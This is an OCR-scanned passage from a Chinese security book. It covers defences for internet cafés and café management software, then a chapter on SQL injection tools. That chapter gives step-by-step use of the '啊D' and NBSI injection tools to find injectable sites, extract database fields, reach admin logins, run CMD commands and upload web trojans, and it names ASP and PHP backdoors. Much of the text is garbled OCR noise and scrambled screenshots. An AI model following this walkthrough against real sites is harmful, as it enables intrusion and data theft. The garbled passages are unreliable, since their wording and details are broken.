1. 使 用 专门 的 密码 防盗 工具 

为 了 保护 计算 机 的 基本 设置 ， 网 吧 一 般 都 将 〈Ctrl+Alt+Del》 等 组 合 键 进行 限制 ， 使 用 
户 根本 无 法 知道 是 否 有 网 络 监听 工具 在 运行 ， 不 过 用 户 可 以 下 载 专 门 的 密码 保护 软件 来 保 
人 码 等 隐私 信息 。 和 常用 的 工具 有 传奇 密码 防盗 专家 、 网 吧 密 码 防 盗 专 

。 使 用 网 吧 密 码 防 盗 专 家 来 保护 网 络 游戏 账号 信息 的 具体 操作 步 又 如 下 。 


STEP01: 打开 网 吧 窗 码 防 盗 专 家 STEPO2: 切换 至 Go 选项 卡 


消息 二 一 | 关于 | 上 | 新 闻 上 
二 二 由 ee 


和 元 -一 
tt Spa 和 


ed 


和 
和 
说 放 细 者 www. pe-phage. com 最 专业 才 是 最 安全 -~ EN 
| i i 行内 存 的 
| | 
闪电 注册 ， 十 分 钟 内 即 本 获取 注册 鹅 aa 启动 


在 “关于 ”选项 卡 中 可 看 到 该 软件 的 相关 信息 ， 例 ” 单 击 “启动 ”按钮 ， 程 序 即 开始 对 账号 进行 密码 保 
如 使 用 先进 的 内 存 伪装 技术 ， 可 对 密码 进行 动态 伪 ” 护 ， 并 实时 捕获 各 种 隐患 的 病毒 、 木 马 等 ， 还 能 在 
沪 等 o 黑客 发 六 密码 邮件 时 截获 其 邮件 账号 和 密码 。 
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Py > 
全- 工具 全 攻略 


合 公 他 他 
STEP03: 切换 至 “配置 ”选项 卡 STEP04: 密码 更 改 成 功 
夯 网 吧 密 码 防 盗 专家 网 络 版 (未 注册 ) , Netbargp | | 
消息 ”村 置 | 关于 | 历史 | 网 络 | 新 间 | = 
一 -可疑 模块 
右键 菜单 可 信任 或 是 除 此 模块 


在 线 注 册 
0 
A Tr 单 击 “OK” 按 钮 ， 完 成 
Gadisriim 权限 设置 。 


在 权限 设置 选项 下 根据 9 
提示 输入 密码 。 密友 " 按 乌 。 


yz 密码 防盗 专家 系列 分 为 : 密码 防盗 专家 综合 版 ， 主 要 针对 个 人 用 户 设计 ; 
Re 网吧 密 码 防盗 专家 网 络 版 ， 主 要 针对 网 吧 管 理 人 员 设 计 。 这 里 使 用 的 是 网 吧 密 
注意 。” 码 防盗 专家 网 络 版 ， 普 通用 户 则 使 用 密码 防盗 专家 综合 版 


STEP05: 切换 至 “历史 ”选项 卡 STEP06: 打开 “历史 ”选项 卡 


局 网 四 宅 码 防盗 专家 网 络 版 (未 注册 ”和 放 E 
消息 | 醒 置 | 关于 ”历史 | 网 络 | 新 闻 | 
- 已 处 理 模块 


消息 | 配置 “| 关于 
已 处 理 模 抉 


右键 菜单 可 进行 还 原 操作 右键 菜单 可 进行 还 原 操作 


弹出 “权限 管理 ”对 话 框 ， 在 “输入 管理 密码 ” 文 ”查看 已 处 理 的 模块 ， 还 可 以 进行 还 原 操作 。 
本 框 中 输入 管理 密码 ， 并 单 击 “OK” 按钮 。 
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STEP07: 切换 至 “网 络 ” 选 项 卡 
| 品 网 吧 窗 码 肪 盗 专家 网 络 版 (未 注册 ) 所 | 器 
消息 | 配置 | 关于 | 历史 网络 | 新 司 | 
-网 络 造 项 
填写 本 机 描述 信息 ， 用 来 在 接收 报警 时 区 分 
Ei 


本 机 措 述 : [EL .| | 川 ”在 “权限 管理 ”对 话 框 中 输入 设置 的 管理 密码 ， 即 

Le 图 ”可 打开 “网 络 ”选项 卡 ， 在 其 中 可 对 网 络 选项 、 报 

| | 输入 管理 密码 : 警 信息 等 属性 进行 设置 。 
| | | 


i 


报 敬 接收 机 咖 


密码 防盗 专家 还 可 以 查 杀 很 多 恶意 软件 ， 如 冰河 木马 、QQ 密码 侦探 、 广 外 幽灵 、 边 
锋 盗 号 机 、 传 奇 击 键 、OICQ 密码 监听 记录 工具 、QEyes 潜伏 猎手 、 密 人 码 专 家 、 传 奇 游戏 在 
线 击 刍 记录、 超级 密码 记录 木马 、 联 众 木 马 监听 器 、 按 键 记录 器 等 。 

2. 使 用 加 密 技术 

如 果 局 域 网 中 的 数据 包 经 过 加 蜜 后 再 传输 ， 通 过 监听 得 到 的 信息 驶 会 是 乱码 ， 从 而 
可 以 保护 账号 和 密 人 码 ， 但 是 使 用 加 密 技 术 影 啊 数 据 传 输 速 度 ， 用 户 要 谨慎 使 用 访 种 防 续 
音 施 。 

3. 网 络 分 段 

网 络 分 段 是 将 一 个 物理 网 络 划 分 为 多 个 多 辑 子 网 的 技术 。 网 络 分 段 作 用 是 将 非法 用 户 
与 敏感 的 网 络 资源 相互 隔离 ， 从 而 防止 可 能 的 非法 监听 。 一 个 子 网 段 是 一 个 小 的 局 域 网 ， 
监听 的 计算 机 上 只 能 在 目 己 的 小 网 段 内 监听 ， 而 不 会 监听 别 的 子 网 段 。 还 可 以 使 用 专门 的 反 
监听 工具 ， 如 AntiSniffer， 进 行 防 范 。 

4. 使 用 划分 VLAN 技术 

虚拟 局 域 网 (VLAN) 是 根据 需要 灵活 地 加 入 不 同 的 逻辑 子 网 的 一 种 网 络 技术 。 建 
普 了 虚拟 局 域 网 后 ， 各 个 虚拟 网 之 间 不 能 直接 进行 通信 ， 而 必须 通过 路 由 堪 转 发， 为 高 
级 的 安全 控制 提供 了 可 能 ,增强 了 网 络 的 安全 性 ,这样 可 以 防止 大 部 分 基于 网 络 监 昕 的 
入 侵 。 


6.5” 美 浏 网 官 大师 


“ 美 萍 网 管 大 师 ” 软 件 具 有 实时 计时 、 计 费 、 计 账 于 一 体 的 功能 ， 是 网 吧 管 理 员 必 备 的 
一 和 坎 工 上 只。 该 工具 既 可 单独 作为 网 吧 的 计 费 管理 机 ， 也 可 配合 安全 卫士 远程 控制 整个 网 络 
内 的 所 有 计算 机 ， 还 可 以 对 任意 机 器 进行 开通 、 限 时 、 关 机 、 热 启动 等 操作 ， 并 且 具 有 会 
员 管理 、 网 吧 商 品 管理 、 每 日 费用 统计 等 众多 功能 。 

使 用 “ 美 萍 网 管 大 师 ” 软 件 管理 网 吧 中 计算 机 的 具体 操作 步骤 如 下 。 
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里 守 和 
售 人 人 他 


STEP01: 打开 关 泣 网 管 大 师 


量 简 图 
讲 而 相 。 铺 时 开 机 


EE Bb sl 


选择 一 


栏 中 


的 “远程 天 机 ”按钮 。 


STEP03: 返回 主 窗口 


毅 面 图 
计时 而 机” 朗 83 厅 所 由 


喔 1:j GT 


hi 导 机 


ET EEE :| 


单 击 “系统 设置 ”按钮 盎 。 
STEP05: 打开 “ 美 萍 软件 设置 ”对 话 框 


i 
和 


记录 | 设置 ” 计 费 | 管理 ”| 商品 | 


计 盐 慰 准 | 分 时 自 计 课 | 上 网 程 序 设置 | 安 员 计 页 | 


合计 算 机 ( 这 里 选择 1 号 计算 机 ) 


全 攻略 


督 通 上 机 计 咒 眉 元 / 枉 小 | 下 冰 机 分 别 册 家 | 
上 网 上 机 计 惠 忆 元 /本 J 时 皮 但 机 分 叶 珊 | 
最 小 计策 主 晤 0” 元 浅 。 最 候 冰 机 名 匡 |” 元 楼 即 疡 请 的 开机 更 用 ) 


当前 时 间 区 为 最 小 计 讽 时 间 单 位 的 了 | 和 时 开 娩 计 需 【 佑 出 软件 项 助 ) 


最 小 计 南 时 间 单 位 ho 3 疗 锅 上 mah 3 装 锌 的 下 政 取 费用 


反 当 限 时 号 去 局 春生 分 转 届 元 刘 操 达 户 机 发 出 提示 术 息 。 。” 周 计 雳 竺 轩 和 证 


折 主机 加 引 时 间 量 导 直 要 提示 提示 内 中 为 naon sREDIA\Ihe er: 


, 单 击 工具 


在 “" 计 费 ” 选项 卡 中 可 对 “ 计 费 标准 "" 分 时 段 计 费 ” 
等 属性 进行 设置 。 
STEP07: 切换 至 “记录 ”选项 卡 
FT 


[记录 十 设 置 ”| 计 夺 | 管理 | 商品 | 


单 击 “操作 历史 记录 ”按钮 。 
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历史 记录 
中 可 历史 记 某 


已 系统 管理 员 身 价 查 看 收 刘 历史 记录 ， 梧 删 踢 记录 芝 收 柚 详细 蛇 计 | 


司 查看 符 直 襄 户 机 上 用 户 所 济 遇 网 站 的 是 让 记录 


区 二 历史 记录 | 


STEP02: 查看 确认 信息 
提示 信息 [| 


你 确认 要 关闭 1 号 机 器 吗 ? 


单 击 “ 是 ”按钮 ， 即 可 关闭 1 号 计算 机 。 


STEP04: 查看 提示 信息 
信息 


请 输入 设置 密码 
Th 确定 | 


输入 系统 密码 ， 并 单 击 “ 确 定 ”按钮 。 
STEP06: 切换 至 “设置 ”选项 卡 


记录 【于 实 ]] 计 要 | 管理 | 商品 | 


原 同 疝 中 中 学 许 运行 一 个 同 间 六 师 

计 同 络 机 要 总 省 副 汐 加 。 引 着 机器 

同 管 9 绒 卡 乔 玛 卡 的 响 店 时间 是 850” 守 | 过 种 | 六 不 二 训 加 迁 顺 | 
识 户 机 村 夺 响 簿 时 间 | 上。 妆 | 秒 《 邯 在 此 时 间 内 容 户 机 如 时 无 反映 刚 是 [为 未 知 ) 


可 对 密码 和 系统 设置 的 各 个 属性 进行 设置 。 


STEP08: 打开 “历史 操作 记录 ”对 Cau 


历史 揽 必 妃 最 友和 


显示 从 [加 年 月 和 3 卓 站 而 :二 到 [而 9 年 明 呈 日 “| | 品名 二 ja 录 图 开炮 蜡 示 


= 二 

=- | Fr ml 
和 13: 与 的 -全 播放 误 为 同 书 让 站 了 
和 13: 呈 -83 播 作 旺 同 管 设置 m0 as 
竹 0: 号 -3 接 作 过 为 周 管 设置 自问 Ey 
和 1 -3 播 作 避 同 管 设 秆 mo ii 
和 13: 导 -83 揪 作 证 同 管 设置 mo ila 
兢 !3: 瑟 的 -全 播放 二 i 让 站 证 
竹中 史 - 如 播放 训 为 同 宣 设 于 mo yan 
和 141: 号 的 -人 揪 作 下 看 振作 历 中 记录 m0 aa 


查看 主要 操作 记录 并 可 以 管理 员 身 份 删除 记录 。 


.< 第 6 章 
网 游 与 网 吧 攻 防 


STEP09: 返回 “记录 ”选项 卡 STEP10: 查看 客户 机 网 站 历史 记录 


一 一 一 一 1 请 汗 用 安 全 卫士 V7 3 上 柜 本 ) 


“| 设置 | 计 炎 ”| 管理 | 商品 | 
当 精 变 贬 老 称 : 和. 时 
历史 记录 可 让 可 诱 造 择 您 雪 查 看 的 机 器 : | 这 | 号 届 ( 虽 有 此 机 器 记录 , 干 能 本 看》 
-各 各 而 史 记录 | | 目 明 时 间 友 


中 系统 管理 员 身 价 查 看 收 离 历 中 记录 ， 可 月 只 记 录 。 区 器 加 详 奶 炬 计 


「 担 作 古 史记 录 一 
以 系 坟 管 理 员 身份 查看 要 作 扎 史 记录 ， 梧 市 唆 记 录 国手 作 西 史记 录 


-史记 录 


单 击 “网 站 历史 记录 ”按钮 。 查看 某 人 台 客 户 机 浏览 的 网 站 ,判断 用 户 是 否 进 行 了 
下 载 操作 。 
STEP11: 返回 主 窗口 STEP12: 打开 “信息 ”提示 框 


古 六 = 中 忻 证 启 硅 筷 [| 
Fr ee] 信息 
二 | 1 


ii 四 隔 子 居 rh 
| : DD systen 请 输入 密码 


输入 设置 的 系统 密码 ， 单 击 “确定 ”按钮 。 


:de 


EE EE he EE EE 了 


单 击 “会 员 管 理 ” 按 钮 项 | 。 
STEP13: 打开 “会 员 制 管理 ”对 话 框 


土 遇 雪 辣 [=] | LE 


可 对 本 网 吧 的 会 员 进 行 会 员 充 值 、 新 增 会 员 、 资 料 
修改 、 资 料 备份 、 会 员 统计 等 各 种 管理 。 
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本 草 主要 介绍 常见 的 注入 攻击 工具 , 有 助 于 读者 了 解 注入 攻击 的 基本 流程 ， 
通过 对 注入 攻击 的 深层 实战 剖析 ， 体 会 这 种 攻击 的 方法 和 手段 ， 从 而 找到 有 效 
防范 注入 攻击 的 方法 。 


SQL 注入 攻击 前 的 准备 
“ 啊 D” 注 入 曝光 

NBSI 注入 曝光 
Domain 注入 曝光 


PHP 注入 工具 ZBSI 


SQL 注入 攻击 的 防范 


< 第 7 章 


注入 工具 


7.1 SQL 注入 攻击 前 的 准备 


注入 攻击 是 攻击 者 通过 Web 把 恶意 的 代码 传播 到 其 他 系统 上 ， 这 些 攻 击 包 括 系统 调用 
(通过 Shell 命令 调用 外 部 程序 ) 和 后 台数 据 库 调 用 (通过 SQL 注入 ) 等 。 当 一 个 Web 应 
用 程序 通过 HTTP 请 求 把 外 部 请 求 的 信息 传递 给 应 用 后 台 时 必须 非常 小 心 ， 否 则 注入 攻击 
束 可 以 将 特殊 字符 、 恶 意 代 人 码 或 者 命令 改变 占 注 入 这 些 信 息 中 ， 并 传输 全 后 台 执 行 。 

由 于 SQL 注入 是 从 正常 的 Web 闪 口 攻击 的 ， 而 且 看 起 来 与 一 般 的 Web 页 和 面 一 样 ， 所 
以 目前 防火 墙 无 法 发 现 SQL 注入 攻击 。 如 果 网 站 管理 员 没 有 查看 IS 日 志 的 习惯 ， 则 可 能 
在 被 注入 攻击 很 长 时 间 内 都 不 会 发 党 ,所 以 SQL 注入 攻击 是 目前 黑客 比较 喜欢 的 攻击 方式 。 


1.1.1 设置 “显示 友好 了 TP 错误 信息 ” 


由 于 SQL 注入 攻击 需要 利用 服务 器 返回 出 错 信 息 ， 但 在 正 浏览 器 中 默认 是 不 显示 友 
好 HTTP 错误 信息 的 ， 因 此 在 进行 SQL 注入 攻击 前 需要 设置 属性 。 上 有 具体 的 设置 步骤 如 下 。 
STEP01: 打开 IE 浏览 器 STEP02: 打开 “|nternet 选项 ”对 话 框 


© 


Internet 选项 |_b lm | Internet 选项 


[常规 [安全 [隐私 [内容 [连接 [程序 | 高 加 
I 设置 
梧 靖 拓 加 下 划 对 
_” 全 从 不 


国 始终 
= 器 悬 售 
使 用 默认 值 下 ) | 二 用 新 选项 卡 负 ] 加 为 网 页 上 的 按 扭 和 控件 启用 视觉 样式 
Bh 四 下载 所 入 和 知 
辐 从 上 次 会 话 中 的 选 需 卡 开始 曙 ) 
而 从 主页 开始 00 
选项 卡 司 在 后 台 加 载 牛 点 和 内 容 以 优化 性 能 = 


[ET | Hel 


更 改 网 页 在 选项 卡 中 的 显示 方式 。 本 在 文件 资源 已 理 器 和 “运行 ”对 话 框 中 使 用 直接 插入 
测 | 咯 毛 中 记录 aa aa F zs 

腹 除 临时 交 件 、 历 史记 录 、cookis 、 保存 的 密码 和 网 页 夫 单 信息 。 + 三 重新 启动 你 的 计 交 机 后 生效 

加 退出 时 哺 喀 浏览 历史 记录 上 四) [还 喇 高 级 设置 | 

| 彩 除 血 ).. . 设置 8) | 十 置 Intarmet Explorkr 设置 

外 观 将 Internet Explorkr 设置 重 置 为 默认 设置 。 重 竺 司 ) | 
[nt (CT | 
颜色 m) | | 语言 0) | | 字体 名 | | 辅助 功能 人 E) | 只 有 在 浏览 器 处 于 天 法 使 用 的 捧 访 时 ， 才 应 使 用 此 设置 。 


| 


玉 驴 到 | 于 到 a [| 应 用 内 || 陪 肖 | 应 用 WW | 


选择 “工具 ” > “|nternet 选 项 ”菜单 命令 。 选择 “高 级 ”选项 卡 ， 勾 选 “显示 友好 HTTP 错 误 
信息 ” 复 选 框 。 单 击 “确定 ” 按 钮 ， 即 完成 设置 。 


《12 准备 注入 工具 

在 SQL 注入 过 程 中 ， 一 般 会 利用 一 些 特殊 的 工具 来 提高 入 侵 的 效率 和 成 功率 ， 如 
SQL 注入 漏洞 扫描 工具 、 注 入 辅助 工具 及 Web 木马 后 门 。 在 进行 注入 攻击 前 须 准备 这 
几 种 工具 。 
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PE > 
全- 工具 全 攻略 


全 人 人 他 
(1) SQL 注入 漏洞 扫描 器 
注入 工具 是 用 来 检测 网 站 漏洞 和 一 些 敏 感 信 息 的 工具 , 可 用 于 ASP 环境 的 注入 扫描 器 
有 NBSI、 冰 舞 等 。 其 中 谈 舞 是 一 款 针 对 ASP 脚本 网 站 的 扫描 工具 ， 它 可 以 寻找 目标 网 站 
存在 的 注入 漏洞 ， 其 主 窗口 如 下 左 图 所 示 。 
而 用 于 PHP+MySQL 环境 的 注入 工具 有 CASI、PHPrf、 二 娃 等 。 其 中 CASI 是 用 VB 
编写 的 PHP 注入 辅助 工具 , 它 利用 MySQL 的 load_file0 函 数 来 读 取 文件 , 其 主 窗口 如 下 厂 


我 们 从 pe i TT 、 De 


! Ua 二 | | 
a D 如 和 | 4 ‘A 分 ' 渍 A J a | 所 用 站 - a NS a | 
了 - , z 


-Feb sr 一 
Sup luc i | | 1 tip Hee philaills, sr 


已 取消 网 页 导航 


许可 以 尖 试 以 下 国 必 : 
和 ”而 是 该 贞 面 。 


一 一 昌 - 
[FE 豆 4 0 Capyri eht DUS- 加 加 四 加 大 大国 加 大 国 四 加 四 加 加 加 国 国 | hother: Sser kitbdn ele ere 


“ 冰 舞 ” 主 窗口 "CASI” 主 窗口 

这 些 工 具 大 部 分 都 采用 SQL 注入 漏洞 扫描 与 攻击 于 一 体 的 综合 利用 工具 , 使 攻击 者 迅 
速 完 成 SQL 注入 点 寻找 与 数据 库 密 但 修 解 、 系 统 攻击 等 过 程 。 

(2) Web 木马 后 门 

Web 木马 后 门 是 在 注入 成 功 后 , 安装 在 网 站 服务 器 上 的 一 些 特殊 的 木马 后 门 。 和 常见 的 Web 
冰 狐 浪子 ASP 木 号 (其 客户 闹 如 下 左 图 所 示 )、 海 阳 顶 端 网 ASP 木马 〈 如 下 右 图 所 

示 ) 等 。 而 PHP 木马 后 门 工 具有 黑客 之 家 PHP 木马 、PHPSpy 等 ， 主 要 用 于 注入 攻击 后 控制 

PHP 二 境 的 网 oh 


各 洒 卫 全 对 清理 45P 世 站 客户 吉 Mierepoft Tntwrnet Heplerer ll 国 海 疼 项 端 网 &5P 林 马 2006 a 组 癌 露 - By Nnrcos W26696792 
ET eg i 站 
Ba 加 . 国 国 从 | 户 mm 丙 eax @ | 会- 马 回 . 口 二 页面 和 
Eo DE 大- 二 AiaiaerfsahaF as 和 ee 通 六 性: om 本 _ 连 择 | 
Coogle| = ~ 县 二 .: 二 交 动 ， 夫 及 极 率 。 坟 引 殉 再 I 生硬 : [a Li te. i 生 三 | 
es 厂 和 吉 用 广 沪 卫 广 她 让 
pr 厂 客户 请 各 劳 息 
Tepems i 
厂 本 sript. 5hell 程 序 硬 生 训 ved. as 
厂 Shal1, Mplieatise 避 序 运 行 睁 Hit: Mra, hididi, sot 
i Mut: /mee hi rie. 
Hitp: /ime ha yas, Not/ auE et dod tx, zh 
感谢 ; 同 层 在 晓 , 佑 起 护 查 ,桂林 老兵 , 三 用 浪子 , 昔 屏 , 小 路 ， 
i 对 各 阳 项 
艳 同 。 二 不 马 所 融 前 一 茹 努力 


冰 狐 浪子 ASP 木 马 的 客户 端 海 阳 顶端 网 ASP 木 马 
(3) 注入 辅助 工具 
由 于 某 些 网 站 可 能 会 采取 防范 措施 ， 因 此 在 进行 SQL 注入 攻击 时 ， 黑客 还 需要 借助 一 
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< 7 齐 


注入 工具 


坚 辅 助 的 工具 来 实现 字符 转换 、 格 式 转 换 等 功能 。 币 见 的 SQL 注入 辅助 工具 有 “ASP 木马 
C/S 模式 转换 器 ”〈 如 下 左 图 所 示 ) 和 “C2C 注入 格式 转换 器 ”( 如 下 右 图 所 示 )。 


ASP 木 马 C/S 模 陈 转换 器 C2C 注 入 格式 转换 器 


7.2 “ 啊 D" 注 入 曝光 


利用 手工 进行 注入 攻击 具有 相当 大 的 难度 ， 而 利用 一 些 注入 工具 进行 注入 攻击 就 简单 
得 多 。“ 啊 D” 注 入 工具 束 古 一 于 出 现 相 对 较 早 、 功 能 非 第 强大 的 SQL 注入 工具 ， 利 用 访 
工具 可 以 进行 检测 和 卷 注 、 猜 解 SQL、 破 解密 码 、 管 理 数 据 库 等 操作 。 


《121 “ 啊 及 ”注入 工具 的 功能 


“ 啊 D” 注 入 工具 是 一 款 针 对 ASP +SQL 注入 的 工具 ， 其 界面 和 功能 都 与 NBSI 工具 类 
似 ， 利 用 该 工具 可 以 检测 出 更 多 存在 注入 的 连接 。“ 啊 D” 注 入 工具 使 用 多 线程 技术 ， 大 大 
提高 了 检测 速度 。 其 主要 功能 有 跨 库 查询 、 注 入 点 扫描 、 管 理 入 口 检测 、 目 录 查 看 、CMD 
命令 、 木 马上 传 、 注 册 表 读 取 、 旁 注 / 上 传 、WebShell 管理 、Cookies 修改 等 。 可 以 看 出 ， 
该 工具 是 集 多 种 功能 于 一 身 的 综合 注入 工具 包 ， 是 目前 运用 最 广泛 的 一 款 注 入 工具 。 


1.2.2 “ 啊 及 ”批量 注入 曙光 
下 面 将 曝光 “ 啊 D” 注 入 的 具体 操作 。 
STEP01: 下 载 并 解压 “ 啊 D” 注 入 工具 包 ”STEP02: 输入 注入 网 址 


加 本 二 六 工具 ,2.32 并 医用 喇 语 法 椒 法 运 Hittps/ /vraidartLeeomn 


误 件 |F 篇 赋 IE) 查 碍 Wi 工具 [站 本 动 IHI 
诅 训 = 相去 到 库 由 ” 新 建立 忻 记 


时 下 卉 


本 | 点 本 


刘 是 折光 后 的 位 面 
d39.mdb , 遇 0 注 入 工具 
司 库 htm N22 
| PPTYERE 和 和 
国 贡 要 
区 | 图片 
下 也 署 下 载 


起 曾孙 


二 标本 诅 


双击 “ 啊 D 注 入 工具 ”应 用 程序 图 标 。 单 击 “扫描 国 在 “注入 连接 ”地 址 栏 中 输入 
注入 点 ”按钮 。 注入 的 网 址 ， 单 击 “ 检 测 ”按钮 。 
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时 工具 全 攻略 
全 人 人 他 


STEP03: 打开 网 站 


回 咖 D 违 六 工具 “233 咱 强 异 辕 级 挤 牛 及 去 HP drkesh sor 


ts cer np a 信 i | 

hl Eada crm apdkhwqaizr Nem Tt 5DCaSS5D467 = 

#0 中 年 2 有 E eS nmpiionorEag asp. 到 本 村 不 着 旺 GOGGLE 上 面 
CemmpHioner ig nap ?el= 芝兰 得 到 而 多 丫 注 上 站 存在 注 关 着 如 轴 你 是 攻 插 ， 
inur CompHonorBin asp 过 十 我 回答 人 网 油 宝 排 过 

SB tot Camearth nex 柯 .= 

崩 诺 恰 东 腹 其 路 件 ， 书 炸 ji 床 忆 | 报 二 ， 汽车 用 品 硬件 大 托 让 识 栈 ， 风 划 : 测 
玩具 呵 上 用 /可 量 /有 | 靖 生 -电子 吨 工 ， 必 贡 市 场 -35 数 本 要 间 市 场 辆 上 栈 改 
逻 醒 关 撤 慎 讲 本国 


WW i Omori ln= 1 < 
Bb 
| 
司 同宗 MW [4] | i 
hl vp: me. degy. #h tty ihrii y ichy 地 | - 
Witph i ses hls lh Fi pH i 天 二 


查看 网 站 及 扫描 到 的 注入 点 。 


STEP05: 检测 表 段 以 及 字段 


[由 到 和 入 工具 ,之 933 十 强 质 参 衣 下 民 放 于 Httpyeere dattcom 


于 点 四 舍 [at ie Buy. cnt mp lesarbig wepiid=33 


| | 由 | 再 ”开拓 他 醒 
草本 奈 : 二 


I si 


DELL: 


国 检测 完成 后 , 继续 园 任意 选中 一 个 表 段 ， 
单 击 “ 检 测 表 段 " 按钮 ， 单 击 “ 检 测字 段 ” 按钮 ， 
可 检测 相应 的 表 段 。 可 检测 该 表 对 应 的 相应 
字段 。 
STEP07: 返回 主 界面 
回 肝 0 广 和 工具 ,3.33 曾 可 下 史 提 后 下 的 去 Hanw darkultam 


重信 性 和 网 站 术 直 [eg: Nts bu cum 
可 用 高 接 和 目录 村 置 


mt ti hi ,ii dh 
inp thos, bel oom ouput 
tp ti bwin gt 
htap ts 1 er 
sp ta di tists. be 
和 ata Ft 
和 at jitiath be 


ce i i 击 夺 让 
Bi comi errrarct, 
Soh in Fowlij 
mt hn tb built emibtaladia letia up 
物 ittp dts bi 二 后 
a btn ti bi em i rerki Fi lm up 
i hip bi hii So i i i 
ht tbe bd lL em ph us 
入 i PE th bi LL 

Bb build sums 二 一 一 Fi 

i i 


Sb 
+ 
让 
+ 
EE 
di ht tik bald com rch lagis vip 
db. 
bi 
bh 


上 dn ps er ETF 

bi biid cenitl_ sizs i 
dt ap ib bi erm mab dei, vip 
i hp hi 二 二 本 让] 全 本 看 研 和 生起 二 二 全 
dt hi 称 本 | 上 二 扩 汪 避 抽 _ 避 抽 夯 ， 二 下 
st i hd di 
a hi bos, bal Som mi bs, bedp, sus 
ht 
mt tip tbs, bal om/m a ik 


单 击 “ 管 
理 入 口 检测 " 
按钮 。 


登录 入 口 点 ， 从 快捷 菜单 中 选择 
“用 IE 打开 连接 ”命令 。 


136 


STEP04: 修改 Cookies 


加 0 证 入 工 旧 v2.32 幸 本 二 戎 三 防 书 放 二 Http daren.com -| 


入 入 荐 简 “| 想到 同 昌 ttp We el WigflstrEaaesreieauanc 四 全 局 必 | 


畴 | | asia 位 纹 
| Fi = 1 ch ab ad lab eT Fa Le ri 


| 
ee 7- r=- 1H=] S050 LBeT dT -ECT CI | 证 


二 
"obit: ee 3 epi 
下 让 
TT 生计 中 hh | 
pe er PT | i Wh Ct re 1 了 


[FRR va 

单 击 @| 按钮 ， 可 对 此 
Cookies 进 行 修改 。 击 “SQL 注 入 检测 ”按钮 。 
STEP06: 查看 检测 内 容 


| | 三 弄 赔 位置。 | 过 


: [am 司 口 情 呈 时 伸 止 
5 Aceraai 卫 对 他 插 二 十 
] 当前 闸 户 | 


四 根据 需要 选择 表 字 段 ， 圈 在 下 方 的 列表 框 中 
单 击 “ 检 测 内 容 ” 按 钮 ， 查看 详细 的 检测 内 容 。 
开始 令 测 内 容 。 


STEP08: 打开 链接 网 页 


路 吧 
妈 南 | 可 萤 


图 下 次 自动 豆 录 


可 以 使 用 蕊 下 方式 登 莹 


器 


加 在 “网 站 登录 ”页 面 中 输入 
登录 的 “用 户 名 ”和 “密码 ”。 


录 ” 按 钮 。 


STEP09: 成 功 登 录 


STERTO: 


返回 主 界面 


国 机 0 注入 工 具 #2.32 卉 得 下 吐 诅 过 六 挫 二 HttpWAwwswvdaricateem 
注入 糖 科 性 对 引 tT 


器 站 [1) ” 岗 呈 于 机 窜 户 测 。 百度 首页 
后 醒 守 入 占 百 


僻 


cE | 


查看 登录 成 功 的 百度 贴吧 页 面 。 


STEP11: 单 击 “会 员 登 录 ” 按 钮 


MM 示 


全 啊 记 , 清 科 入 从 的 由 和 让 码 运 和 二 和! ! 


本 和 人 御 的 


加 有 任何 里 问 ， 请 和 狼 联 系 1 


2121 WE 1302 


了 在 “注入 连接 ” 园 输入 用 户 名 和 密码 ， 单 击 
地 址 栏 中 输入 需 登 “登录 ”按钮 ， 即 可 以 会 员 身 
录 的 网 址 。 份 登录 该 网 站 。 

STEP13: 返回 主 界面 


机 于 .. | 出 亲 目录 内 容 | 
|htep esa bhaidu com lL 


临时 吉 [em_Tsp | 


单 击 “ 浏 览 网 页 ”按钮 可 快速 浏览 该 网 页 。 
STEP12: 新 用 户 进 行 注 册 


图 | 4 到 | 


2 和 于 Hepler dari sem 
DL 末 强 后 吴 柱 绒 术 党 二 
注入 转 副 


Em LETTOTTETTETEEI 
三 户 台 周 ”网 户 本 贡 | 吹 生 于 喇 | 风尘 四 | 
本 本 守信 谨 


出 访 黑 副 | 
Faure Me td 
你 的 竺 坑 


be ede Eeld 121 愉 EL E13 
一 一 一 


单 击 “用 户 注册 ”选项 按钮 ， 填 写 注 册 信息 并 单 击 
“马上 注册 ”按钮 ， 即 可 注册 成 功 。 


目录 查看 - 


团 在 “相关 工具 ”栏目 中 单 击 “ 
按钮 。 


辆 输入 要 注入 的 网 站 地 址 并 单 击 “ 检 测 ”按钮 。 
留 选择 要 检测 的 目标 磁盘 并 单 击 “ 开 始 检测 ” 按 


钮 ， 即 可 查看 网 站 的 物理 目录 ( 只 有 MSSOQL 数据 
库 才 能 查看 ) 。 
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Bo = > 
A 


STEP14: 单 击 “CMD/ 上 传 ”按钮 STEP15: 单 击 “注册 表 读 取 ” 按 钮 


DL 2 委 者 嘲 好 尝 玉 的 二 Hrtpsjoeee dr com Er 加 而 二 工具 “2.32 二 视 是 辐 刘 要 术 认 二 Hitips eedarosbcorn 


| 汪 入 这 屿 itp ti buildin comd 1312i | ER TREE 
工具 h : 相关 工具 


=| 潜行 “|‖ 加 国 本 | m3 闪 祝 [本 LL] 可 到 ELT ECIL RCHTE 加 EST Cnr lull Garmin rr rl Bedi 
eh L ~ 村 ELL 二 内 座 
批量 襄 腊 注 国 丙 内 容 


园 喇 喘 杂 位置 HE 


变 评 上 兽 
事 邱 谈 体 目标 丛 填 
国 册 AT 本 马 】 | El rt 


[isp rasa baldu.comy 12121 N20 11D 


用 户 若 拥有 一 个 SA 权限 的 数据 库 ， 就 可 以 在 这 里 击 “ 读 取 ” 按 钮 ， 即 可 读 取 注 册 表 的 键 值 来 确定 
执行 CMD 命 令 ， 或 上 传 一 些 脚本 等 小 文件 。 i 忆 。 


Wl 注入 “设置 ”页 面 


四 机 0 注入 工具 v 荆 于 于 而 版 三 让 按 于 说 二 Httpo /ews durksicom 
TO 
下 部 工 上 
访 置 过 质 


所 


a 


a 


单 击 “设置 选项 ”中 的 “设置 ”按钮 。 


和 全 下 
四 


i 
= 者 


bl 
bE 
司 
- 
是 
bE 
司 
- 
bi 
bl 
E 
- 
bd 
本 
Ei 
CE 


er 表 段 、 字 段 等 内 容 进行 设置 ， 

可 添加 一 些 自己 要 检测 的 内 容 。 因 为 有 些 需 要 猜 
pal 或 字段 里 面 是 没有 的 二 所 以 只 能 在 这 里 添 
加 。 


| FE 


基于 


hep tebe bndu eeen I 3 12 LO LE 1 C32 


NBSI 注入 工具 也 是 黑客 经 常 使 用 的 注入 工具 , 利用 该 工具 可 以 对 各 种 注入 漏洞 进行 解 
码 ， 从 而 提高 猜 解 效率 。NBSI 被 称 作 网 站 漏洞 检测 工具 ， 是 一 球 ASP 注入 漏洞 检测 工具 ， 
在 SQL Server 注入 检测 方面 有 极 高 的 准确 率 。 


71.3.1 NBNI 功能 概述 


